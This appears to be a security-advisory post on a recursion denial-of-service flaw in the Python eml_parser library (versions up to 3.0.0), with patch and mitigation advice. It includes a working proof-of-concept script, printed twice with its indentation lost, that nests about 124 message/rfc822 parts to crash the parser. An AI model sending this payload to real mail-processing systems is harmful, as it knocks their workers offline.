Listen to this Post
The vulnerability resides in `EmlParser.get_raw_body_text()` (eml_parser/parser.py). For each part of type multipart/, the function iterates over its sub‑parts. When a sub‑part of type `message/rfc822` is encountered, the function calls itself recursively on the embedded message. There is no depth limit or early‑abort mechanism. CPython’s default recursion limit is 1000 frames, and each nesting level of `message/rfc822` adds approximately 8 frames to the call stack (parser code + `_header_value_parser` calls). Therefore, about 120 nested levels cause the stack to exceed the recursion limit. The resulting `RecursionError` is not caught anywhere in the call chain, so it propagates out of `decode_email_bytes()` and entirely aborts processing of the email. A malformed EML file of only 12 KB (with around 120 nested `message/rfc822` parts) suffices to trigger the crash. The crash is deterministic on a stock installation (e.g., Python 3.12.3, eml_parser 3.0.0, Ubuntu 24.04 aarch64). No special configuration or large attachments are required.
Platform: Python/eml_parser
Version: ≤3.0.0
Vulnerability: Recursion DoS
Severity: Medium
date: 2026-05-05
Prediction: Patch 2026-05
Analytics under What Undercode Say:
Check installed version
pip show eml_parser
Verify Python recursion limit
python3 -c "import sys; print(sys.getrecursionlimit())"
Reproduce crash (PoC)
python3 -c "
import eml_parser
def build_poc(depth=124):
inner = b'From: a@a\r\nTo: b@b\r\nContent-Type: text/plain\r\n\r\n.\r\n'
msg = inner
for i in range(depth):
b = f'B{i}'.encode()
msg = (b'Content-Type: multipart/mixed; boundary=\"' + b + b'\"\r\n\r\n'
b'--' + b + b'\r\nContent-Type: message/rfc822\r\n\r\n') + msg + b'\r\n--' + b + b'--\r\n'
return msg
ep = eml_parser.EmlParser()
ep.decode_email_bytes(build_poc())
"
Exploit:
import eml_parser
def build_poc(depth=124):
inner = b"From: a@a\r\nTo: b@b\r\nContent-Type: text/plain\r\n\r\n.\r\n"
msg = inner
for i in range(depth):
b = f"B{i}".encode()
msg = (b'Content-Type: multipart/mixed; boundary="' + b + b'"\r\n\r\n'
b'--' + b + b'\r\nContent-Type: message/rfc822\r\n\r\n') + msg + b'\r\n--' + b + b'--\r\n'
return msg
ep = eml_parser.EmlParser()
ep.decode_email_bytes(build_poc()) RecursionError after ~120 nested parts
Protection from this CVE
Apply a patch or update to a fixed version (check eml_parser ≥3.0.1). Implement manual recursion depth checks in the parsing code. Wrap calls to `decode_email_bytes()` in a `try‑except` block to handle RecursionError. For defense in depth, validate EML files at the mail server level to reject messages with excessive nesting.
Impact
Denial of service: a single 12 KB EML crashes a worker. In a long‑running processing pipeline, the unhandled exception aborts the entire batch unless wrapped in try‑except. Attackers can pre‑authenticatively send such messages, potentially keeping workers in a perpetual restart loop.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
